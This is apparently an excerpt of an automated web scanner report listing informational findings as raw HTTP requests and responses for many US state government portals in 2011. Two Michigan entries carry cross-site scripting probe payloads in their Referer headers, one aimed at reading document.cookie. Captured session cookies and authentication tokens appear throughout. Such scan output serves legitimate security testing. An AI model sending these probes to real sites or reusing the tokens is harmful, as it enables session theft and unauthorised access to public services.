
Request

GET /favicon.ico HTTP/1.1
Host: dotax.ehawaii.gov
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:48 GMT
Server: Apache/2.2
Last-Modified: Fri, 15 Jan 2010 06:35:02 GMT
ETag: "31f62c-57e-47d2e340bd180"
Accept-Ranges: bytes
Content-Length: 1406
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

..............h.......(....... ...................................sgF...s...u...y.......................................................................................................................
...[SNIP]...

26.10. https://fortress.wa.gov/dol/dolprod/dsdoffices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fortress.wa.gov
Path:   /dol/dolprod/dsdoffices/

Request

GET /dol/dolprod/dsdoffices/ HTTP/1.1
Host: fortress.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html; charset=utf-8
date: Sat, 30 Apr 2011 12:20:40 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: Microsoft-IIS/6.0
x-old-content-length: 26606
cache-control: private
x-powered-by: ASP.NET
x-aspnet-version: 2.0.50727
Set-Cookie: AMWEBJCT!%2Fdol%2Fdolprod!ASP.NET_SessionId=jicq3e45qrkfam55gph5la45; Path=/
Set-Cookie: PD_STATEFUL_101c5ca4-0734-11dc-b4ac-000255ef2051=%2Fdol%2Fdolprod; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1">
...[SNIP]...

26.11. https://fortress.wa.gov/dol/dolprod/vehoffices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fortress.wa.gov
Path:   /dol/dolprod/vehoffices/

Request

GET /dol/dolprod/vehoffices/ HTTP/1.1
Host: fortress.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html; charset=utf-8
date: Sat, 30 Apr 2011 12:20:40 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: Microsoft-IIS/6.0
x-old-content-length: 34239
cache-control: private
x-powered-by: ASP.NET
x-aspnet-version: 2.0.50727
Set-Cookie: PD_STATEFUL_101c5ca4-0734-11dc-b4ac-000255ef2051=%2Fdol%2Fdolprod; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<head><title>
   WA Stat
...[SNIP]...

26.12. https://geonic.cdc.nicusa.com/geoserver/wms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://geonic.cdc.nicusa.com
Path:   /geoserver/wms

Request

GET /geoserver/wms HTTP/1.1
Host: geonic.cdc.nicusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.ogc.se_xml; charset=UTF-8
Connection: close
Server: Jetty(6.1.8)

<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "https://geonic.cdc.nicusa.com/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionRepo
...[SNIP]...

26.13. https://georgiawildlife.dnr.state.ga.us/service/login1.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://georgiawildlife.dnr.state.ga.us
Path:   /service/login1.asp

Request

GET /service/login1.asp HTTP/1.1
Host: georgiawildlife.dnr.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDCCRQTQAT=JJGJOMPANKAFPMLCIIKOKEKL;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:20:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 28917
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCBDBRT=MNHLBBNBFOPGOOKAIIBNMDLG; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="serve
...[SNIP]...

26.14. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://joblink.alabama.gov
Path:   /ada/works/WorkforceCenter.cfm

Request

GET /ada/works/WorkforceCenter.cfm HTTP/1.1
Host: joblink.alabama.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:21:34 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joblink@joblink.alabama.gov" on "2010.03.27T11:08-0500" exp "2020.03.27T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=6545172;expires=Mon, 22-Apr-2041 12:21:34 GMT;path=/
Set-Cookie: CFTOKEN=81fbc95d26faba7d-A65B55C9-2655-1FA7-D4A367D93293FAA3;expires=Mon, 22-Apr-2041 12:21:34 GMT;path=/
Set-Cookie: CFID=6545172;path=/
Set-Cookie: CFTOKEN=81fbc95d26faba7d%2DA65B55C9%2D2655%2D1FA7%2DD4A367D93293FAA3;path=/
Set-Cookie: TEST=1;path=/

Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th
...[SNIP]...

26.15. https://license.ohio.gov/lookup/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://license.ohio.gov
Path:   /lookup/default.asp

Request

GET /lookup/default.asp HTTP/1.1
Host: license.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:22:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16380
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCASDBT=LEIBCKOBGPFJHLNMJNJCFAIA; path=/
Cache-control: private


<HTML>
<HEAD>
<link rel="stylesheet" type="text/css" href="/css/color_scheme.css">
<link rel="stylesheet" type="text/css" href="/css/main.css">
<title>License Search</title>

<SCRIPT ID=clie
...[SNIP]...

26.16. https://maps-api-ssl.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:22:14 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5331d115efba8054:TM=1304166134:LM=1304166134:S=3lC6GeKYBlhC1NHB; expires=Mon, 29-Apr-2013 12:22:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

26.17. https://mibid.bidcorp.com/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mibid.bidcorp.com
Path:   /Login.aspx

Request

GET /Login.aspx HTTP/1.1
Host: mibid.bidcorp.com
Connection: keep-alive
Referer: http://mi.gov/dmb/0,1607,7-150-9141_56654---,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:39:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20161


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">

...[SNIP]...

26.18. https://myalaska.state.ak.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myalaska.state.ak.us
Path:   /

Request

GET / HTTP/1.1
Host: myalaska.state.ak.us
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:10:31 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8o
Last-Modified: Fri, 14 Sep 2007 20:06:42 GMT
ETag: "6bd4-54-43a1dfe524c8a"
Accept-Ranges: bytes
Content-Length: 84
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<META HTTP-EQUIV=REFRESH CONTENT="0; URL=/home/app">
</head>
</html>


26.19. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses2.nh.gov
Path:   /cgi-bin/professional/nhprof/license.pl

Request

GET /cgi-bin/professional/nhprof/license.pl?board_code=BOA HTTP/1.1
Host: nhlicenses2.nh.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:41:46 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14326
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive

<html><head>
<meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
<title>New Hampshire licensing service</title>
<base href="https://nhlicenses2.nh.gov/professional/categories/">
<s
...[SNIP]...

26.20. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/training.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses2.nh.gov
Path:   /cgi-bin/professional/nhprof/training.pl

Request

GET /cgi-bin/professional/nhprof/training.pl?board_code=SIT HTTP/1.1
Host: nhlicenses2.nh.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:42:40 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 9322
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive

<html><head>
<meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
<title>New Hampshire licensing service</title>
<base href="https://nhlicenses2.nh.gov/professional/categories/">
<s
...[SNIP]...

26.21. https://nhlicenses2.nh.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses2.nh.gov
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: nhlicenses2.nh.gov
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:41:25 GMT
Server: Apache
Last-Modified: Tue, 15 Jul 2008 14:44:41 GMT
ETag: "3c0046-0-c4ae840"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/plain; charset=ISO-8859-1
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive


26.22. https://nhlicenses2.nh.gov/professional/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nhlicenses2.nh.gov
Path:   /professional/

Request

GET /professional/ HTTP/1.1
Host: nhlicenses2.nh.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:41:22 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 13:37:05 GMT
ETag: "3b4833-242a-74dc2240"
Accept-Ranges: bytes
Content-Length: 9258
Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive

<html>
   <head>
       <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
       <title>New Hampshire license renewal service</title>
       <style media="screen" type="text/css"><!--
       a { text-
...[SNIP]...

26.23. https://onestop.michigan.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001Ve_rZqzUAfxMgdZZ9TnjQJg:-D00MP

Response

HTTP/1.1 200 OK
content-length: 0
content-type: text/plain
date: Sat, 30 Apr 2011 12:27:55 GMT
last-modified: Mon, 04 Jan 2010 19:27:31 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)


26.24. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonEnabled.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/images/buttonEnabled.png

Request

GET /onestop-main/OneStop/images/buttonEnabled.png HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/OneStop/ssoNeedPassword.do4c601--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E687572642ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=00019ZIYB-FVRKrzIwI-8cI81wk:-D00MP

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: text/plain
date: Sat, 30 Apr 2011 12:27:41 GMT
last-modified: Wed, 16 Mar 2011 20:21:40 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 120

.PNG
.
...IHDR...............a....    pHYs................*IDAT..U.1
.0.......... .b.&...zl..jg..y.I.e.5...p.....IEND.B`.

26.25. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonHover.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/images/buttonHover.png

Request

GET /onestop-main/OneStop/images/buttonHover.png HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do157a1--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ed3792cda3df
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; IV_JCT=%2Fonestop-main; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: text/plain
date: Sat, 30 Apr 2011 12:28:52 GMT
last-modified: Wed, 16 Mar 2011 20:21:42 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 144

.PNG
.
...IHDR.............2:r#....tEXtSoftware.Adobe ImageReadyq.e<...2IDAT..]...0..@...9..G.R.+...k\.MN8..3?../.\....-.&Y7....4....IEND.B`.

26.26. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 30 Apr 2011 12:24:49 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: genericHTML
Set-Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=B1981083223B49AAF8B9D753FAD991EB|portal20.sa.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcx9UjpVfeUFx19Ud%252FeRI7S2%252FxpJgtc3zKY%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: close


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...

26.27. https://rts.texasonline.state.tx.us/NASApp/txdotrts/RegistrationRenewalServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://rts.texasonline.state.tx.us
Path:   /NASApp/txdotrts/RegistrationRenewalServlet

Request

GET /NASApp/txdotrts/RegistrationRenewalServlet HTTP/1.1
Host: rts.texasonline.state.tx.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:22:56 GMT
Server: Apache/2.2.17 (Unix)
Content-Length: 0
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


26.28. https://seal.verisign.com/getseal  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.verisign.com
Path:   /getseal

Request

GET /getseal HTTP/1.1
Host: seal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 12:25:12 GMT
Connection: close

<!-- x=1; -->

26.29. https://secure.kentucky.gov/portal/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.kentucky.gov
Path:   /portal/login.aspx

Request

GET /portal/login.aspx HTTP/1.1
Host: secure.kentucky.gov
Connection: keep-alive
Referer: http://kentucky.gov/Pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210812687.1304123849.1.1.utmcsr=ky.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=210812687.1043360039.1304123849.1304123849.1304123849.1; __utmc=210812687; __utmb=210812687.2.10.1304123849

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:43:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gqjt3255rvivxbzywyvuhdvc; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24079


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>Kentucky.gov: - Login</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

26.30. https://secure.missingkids.com/missingkids/servlet/CybertipServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.missingkids.com
Path:   /missingkids/servlet/CybertipServlet

Request

GET /missingkids/servlet/CybertipServlet HTTP/1.1
Host: secure.missingkids.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 30 Apr 2011 12:28:18 GMT
Content-type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>National Center for Missing & Exploited Children</title>


<!-- MK
...[SNIP]...

26.31. https://secure.utah.gov/rex/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.utah.gov
Path:   /rex/

Request

GET /rex/ HTTP/1.1
Host: secure.utah.gov
Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: JSESSIONID=627aa9217be58462c8e18734b023; Path=/rex; Secure
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 79
Date: Sat, 30 Apr 2011 11:25:08 GMT

<script type="text/javascript">
document.location = "index.html";
</script>

26.32. https://secure.utah.gov/rex/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.utah.gov
Path:   /rex/index.html

Request

GET /rex/index.html HTTP/1.1
Host: secure.utah.gov
Connection: keep-alive
Referer: https://secure.utah.gov/rex/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=627a4341b3c7de4c5fcf7affae3f; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: JSESSIONID=627b23b1307037a0ea56cd17953a; Path=/rex; Secure
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Sat, 30 Apr 2011 11:25:09 GMT
Content-Length: 6636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">    <head>    
...[SNIP]...

26.33. https://treas-secure.treas.state.mi.us/eservice_enu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://treas-secure.treas.state.mi.us
Path:   /eservice_enu/

Request

GET /eservice_enu/ HTTP/1.1
Host: treas-secure.treas.state.mi.us
Connection: keep-alive
Referer: http://www.michigan.gov/taxes/0,1607,7-238-43513-157514--,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1059
Content-Type: text/html
Content-Location: http://treas-secure.treas.state.mi.us/eservice_enu/Default.htm
